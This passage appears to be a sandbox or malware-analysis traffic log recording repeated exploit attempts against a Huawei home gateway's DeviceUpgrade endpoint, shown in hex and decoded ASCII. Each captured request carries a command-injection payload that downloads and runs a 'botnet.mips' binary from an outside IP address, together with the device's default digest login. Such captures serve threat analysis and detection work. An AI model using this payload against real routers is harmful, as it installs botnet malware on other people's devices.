3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 